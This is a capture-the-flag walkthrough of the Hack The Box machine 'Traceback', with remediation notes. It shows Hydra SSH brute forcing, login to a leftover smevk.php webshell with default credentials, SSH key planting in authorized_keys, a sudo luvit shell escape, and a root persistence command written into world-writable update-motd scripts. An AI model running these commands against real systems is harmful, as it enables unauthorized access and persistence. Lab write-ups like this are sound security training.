Tracker

  • User
  • System
FileFlag
user.txtee805d19c132bc1a61b07207bab307ad
root.txtf38b390b6b0594fb150b44c62719dbcf

Passwords

UsernameHashCleartextNotes
webadmin
sysadmin
root

Summary

Overview

OS: Ubuntu Linux

OS Version: 18.04.3 LTS (Bionic Beaver)

Kernel Version: Linux version 4.15.0-58-generic

DNS Hostname: traceback

Solution

Enumeration

Open Ports

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)

|_banner: SSH-2.0-OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
| ssh-auth-methods:
|   Supported authentication methods:
|     publickey
|_    password

80/tcp open  http    syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))

WhatWeb Summary:

HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], Apache[2.4.29], HTML5
Page Title: Help us
ETag: "459-5911796d5b788-gzip"

Nmap scripts:

| http-comments-displayer:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.181
|
|     Path: [http://10.10.10.181:80/](http://10.10.10.181:80/)
|     Line number: 41
|     Comment:
|_        <!--Some of the best web shells that you might need ;)-->

gobuster:

/
/index.html (Status: 200) [Size: 1113]
/server-status (Status: 403) [Size: 300]

Page Enumeration: /index.html Pasted image 20220913143116

<title>Help us</title>
<body>
        <center>
                <h1>This site has been owned</h1>
                <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
                <h3> - Xh4H - </h3>
                <!--Some of the best web shells that you might need ;)-->
        </center>
</body>

Manual Enumeration/Probing

SSH

Based on the defaced page on port 80, we decide to attempt some brute forcing on SSH. Nmap scans of tcp 22 show that password login is enabled.

We will add the username on the defaced page and root to a userlist, then run hydra with rockyou.txt against SSH.

hydra -L loot/users.txt -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 -o "/root/cybersecurity/htb/boxes/10.10.10.181-traceback/scans/tcp_22_ssh_hydra.txt" ssh://10.10.10.181

While the bruteforce is running, we manually connect to port 22. traceback-1

We will trim our userlist down to just XH4H, generate a wordlist from the defaced site page with cewl, and feed the new lists to hydra for a more targeted brute force.

cewl -m 2 --with-numbers [http://10.10.10.181/index.html](http://10.10.10.181/index.html)

hydra -L users.txt -P passwords.txt -e nsr -s 22 -o "/root/cybersecurity/htb/boxes/10.10.10.181-traceback/scans/tcp_22_ssh_hydra.txt" ssh://10.10.10.181

No results using our custom user and password lists.

Directory Busting to find Webshell Foothold

The defaced page states that a backdoor was left. Our initial gobuster scans did not result in any files, we will run again with a medium wordlist while we are brute forcing against SSH.

gobuster dir -u [http://10.10.10.181:80/](http://10.10.10.181:80/) -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "/root/cybersecurity/htb/boxes/10.10.10.181-traceback/scans/tcp_80_http_gobuster_dirbuster.txt"

Ok, so we found php.txt, and it is the raw php for the smevk.php reverse shell, with creds admin/admin. Where is that though? Did another HTB user upload it somehow?

We google the comment phrase that was found in index.html: "Some of the best web shells that you might need". We find a GitHub repo for Xh4H, with a folder of webshells. https://github.com/Xh4H/Web-Shells

We create a web-shells.txt wordlist containing the names of each of these shells, then run gobuster against the :80/ again.

gobuster dir -u [http://10.10.10.181:80/](http://10.10.10.181:80/) -w web-shells.txt -e -k -l -s "200,204,301,302,307,403,500" -x "txt,html,php,asp,aspx,jsp" -z -o "/root/cybersecurity/htb/boxes/10.10.10.181-traceback/scans/tcp_80_http_gobuster_dirbuster.txt"

We get a status 200 for smevk.php. traceback-2

When we browse to this file we are presented with the webshell logon. Pasted image 20220913143708

We log in with the default webshell credentials we found in php.txt, admin/admin. Pasted image 20220913143723

User Compromise #1

Vulnerability Information

Vulnerability Exploited: Backdoor Dropped by Defacer System Vulnerable: 10.10.10.181 Vulnerability Explanation:  Webshell backdoor smevk.php was left on this machine by unknown attackers. This webshell was utilized to enable arbitrary code execution on the target machine. This ability was leveraged to write our personal public SSH key to the webadmin user's authorized_key file, allowing for SSH login as webadmin. Vulnerability Fix: Host-based antivirus scanning should have detected this dropped file. Severity: Critical

Exploition Steps

Log in to webshell at http://10.10.10.180/smevk.php with credentials admin/admin.

We edit the authorized_keys file in the webadmin user's ~/.ssh directory to add our public key. Pasted image 20220913143922

We are now able to successfully ssh in to the machine. traceback-3

EoP Enumeration

We see a file in webadmin's home, left by user sysadmin. The note states a tool to practice Lua was left. Pasted image 20220913144054

We check our sudo privileges and see that we can run luvit as user sysadmin without a password.

sudo -l

Pasted image 20220913144108

We attempt to use sudo to execute luvit as sysadmin.

sudo -u sysadmin /home/sysadmin/luvit

Pasted image 20220913144130

We look up lua at https://gtfobins.github.io, and find the syntax to execute system commands.

User Compromise #2

Vulnerability Information

Vulnerability Exploited: SUID-bit Misconfiguration System Vulnerable: 10.10.10.181 Vulnerability Explanation:  The SUID bit is set for /home/sysadmin/luvit, a Lua interpreter, and it is configured to allow user webadmin to run the interpreter in the context of the sysadmin user without requiring a password. Once in the interpreter, an OS system command can be executed, still in the context of user sysadmin. Using the system command ability to execute /bin/bash spawns a Bash shell in the context of user sysadmin. Vulnerability Fix: Requiring a password for webadmin to execute /home/sysadmin/luvit with sudo would prevent this attack from ocurring with only SSH authorized_key access. Placing the luvit interpreter binary in user webadmin's path would prevent the  SUID-bit from being necessary and removing this privilege escalation path. Severity: High

Exploitation Steps

Launch the Lua interpreter in context of user sysadmin.

sudo -u sysadmin /home/sysadmin/luvit

Use OS execution to spawn a bash shell.

os.execute("/bin/bash")

traceback-4

We are now sysadmin and can display the required proofs. Pasted image 20220913144404

EoP Enumeration

What's the OS distribution type and version?

cat /etc/*-release

DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04.3 LTS"
NAME="Ubuntu"
VERSION="18.04.3 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.3 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

What's the kernel version? Is it 64-bit?

uname -a

Linux traceback 4.15.0-58-generic #64-Ubuntu SMP Tue Aug 6 11:12:41 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

List of users

cat /etc/passwd | cut -d: -f1

Pasted image 20220913144551

Anything interesting in /home/?

ls -ahlR /home/

Pasted image 20220913144610

Oh, that motd file is cached in my home dir, and is empty. There was a defaced motd when I logged in though, where did that file get sourced from?

root Compromise

Vulnerability Information

Vulnerability Exploited: Improper File Permissions System Vulnerable: 10.10.10.181 Vulnerability Explanation: All files located in the /etc/update-motd.d/ directory are world writeable. This allows for arbitrary shell command execution whenever a user logs in remotely. Vulnerability Fix: Tighten permissions on all files in this directory. Severity: Critical/Etc

Exploitation Steps

Echo a line containing the command to echo our id_rsa.pub key into root's authorized key's file into the defaced motd file located at /etc/update-motd.d.

echo "echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC9v7Pz6RoKJ+r2OcM6/NebUFWB0Iw5qOErOOxWYWew7b28ZH/diJxO8WfJ7ghwbOghZSRXssPFsCnh+EWxZHZtmy0MllzvPH6y6h7tpz3vJbBRGCj7CL39njJrhIou5wLIHyO2Sx8HzlYojP+FSh8N0bqSAdsHtvM/UcBVeRqnXuKEe/iaHFHOPEN8WJ0J/DMyMev/aGbZiAVs2DCY5VUYRY9maD9nkZZlGxPPY38OFTGIDFA4M0UpVmemllhLnfNehAapPbmua5ca75+Kd6bGRlALm4DxEq3Nw7bjI6UdP1bXrH8FNpT7d+gFONkd8DWi2AwRv8V3ztkk196nJUP6CyWoBnE2J6b/UxIlXLVAkrF8d/g7abV1snYN9a0vHTnq1pkFwophNCD3XMkzTXP3hSvSKiTTi7LP227qgl5KFYnHt78Pvd2YCIDVOvFDXCo155i53y9D/uCxvOJUdiO46ZXtzNUUeOh4yr5zCauDeGh+fdW2OLrl2KALuZOjkDk= >> /root/.ssh/authorized_keys" >> /etc/update-motd.d/00-header

Then IMMEDIATELY SSH in to the machine again, ensuring that it is a new session.

ssh sysadmin@10.10.10.181

traceback-5

Now exit the triggering SSH session, and reattempt to connect with SSH as root.

ssh root@10.10.10.181

We are successful. Now we print our required proofs. Pasted image 20220913145044

Next: Blunder